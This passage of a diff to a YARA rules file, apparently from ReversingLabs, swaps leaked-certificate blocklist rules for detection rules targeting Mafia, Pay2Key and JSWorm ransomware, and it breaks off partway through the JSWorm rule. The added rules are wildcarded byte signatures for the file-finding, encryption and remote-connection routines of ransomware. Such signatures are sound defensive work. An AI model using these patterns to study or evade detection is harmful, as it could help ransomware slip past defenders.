+            45
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:3c:c9" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0A82Bd1E144E8814D75B1A5527Bebf3E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Mafia ransomware."
 		author = "ReversingLabs"
-		id = "f3d7d714-8085-524a-814c-ab8cc59ceb4f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "67f09000-751f-539a-b222-25b1502c2728"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L927-L943"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2534e58ce1e5adbb10dbacb664d40cc32faec341bdb93b926cc85b666cc7b77e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Mafia"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ??
+            0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ??
+            ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D
+            4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57
+            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ??
+            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85
+        }
+		$remote_connection_p2 = {
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D
+            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A
+            ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50
+            8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB
+            ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ??
+            8B E5 5D C3 68
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89
+            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF
+            15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$encrypt_files_p2 = {
+            53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5
+            5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40
+            88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D
+            ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A
+            ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8
+            8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
+            C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75
+            ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8
+        }
+		$encrypt_files_p3 = {
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F
+            8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ??
+            0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A
+            4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4
+            8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
+        }
+		$encrypt_files_p4 = {
+            C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ??
+            43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
+            56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ??
+            6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6
+            ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44
+            24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA G2" and pe.signatures [ i ] . serial == "0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3e" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_469C2Cb0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Pay2Key ransomware."
 		author = "ReversingLabs"
-		id = "dd19b988-747d-55b9-825b-2ada1ca83691"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a"
+		date = "2021-04-14"
+		modified = "2021-04-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L945-L961"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "67ff84475cbe231f97daa3ce623689e7936db8e56be562778f8a4c1ebf7bf316"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pay2Key"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E
+            ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74
+            ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4
+            ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ??
+            89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45
+            ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B E5 5D C2
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7
+            45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ??
+            8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE
+            E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB
+            ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5
+            5D C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ??
+            74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08
+            83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ??
+            ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75
+            ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ??
+            ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF
+            75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ??
+            ?? 5F 5E 5B 59 5D C2
+        }
+		$remote_connection_p3 = {
+            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45
+            ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8
+            ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ??
+            68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Services 1024 CA" and pe.signatures [ i ] . serial == "46:9c:2c:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4C0E636A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Jsworm : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects JSWorm ransomware."
 		author = "ReversingLabs"
-		id = "beb2039c-3b0e-5649-96ca-40175493e62c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a4702cc3-1e08-5631-b832-5d28cb92a819"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L963-L979"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "20169cf9ce3f271a22d1376bcf0ff0914f43937738c9ed61fd8e40179405136b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.JSWorm.yara#L1-L93"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8ba5e2f29f5f06e6e6714bbba1129862da8c3a83bf7f296818eddee2593cae38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "JSWorm"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
